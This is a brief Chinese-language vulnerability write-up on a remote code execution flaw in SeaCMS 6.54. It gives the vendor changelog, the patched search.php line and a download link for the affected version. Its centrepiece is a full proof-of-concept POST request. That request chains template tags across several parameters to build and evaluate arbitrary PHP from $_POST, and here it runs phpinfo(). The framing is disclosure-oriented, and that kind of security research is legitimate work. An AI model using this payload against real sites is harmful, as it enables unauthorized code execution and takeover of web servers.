跳转至

Seacms6.54远程代码执行

Affected Version 6.54

链接:https://pan.baidu.com/s/16rV0_xnoN_8-v4WVpCq6YA

密码:qlwh

6.54 和6.53版本的不同之处是在:

search.php的65行的order参数做了限制。

$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";

更新日期:2017年8月7日 v6.54
修复:紧急修复2处高危安全漏洞

更新日期:2017年8月6日 v6.53
新增:微信公众平台模块
优化:采集逻辑
修复:部分文字描述错误
更新日期:2017年2月18日 v6.46
修复:两处安全问题

更新日期:2017年2月6日 v6.45
修复:一处安全问题

POC

http://192.168.0.6/seacms654/search.php
POST:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

References

漏洞预警 | 海洋CMS(SEACMS)0day漏洞预警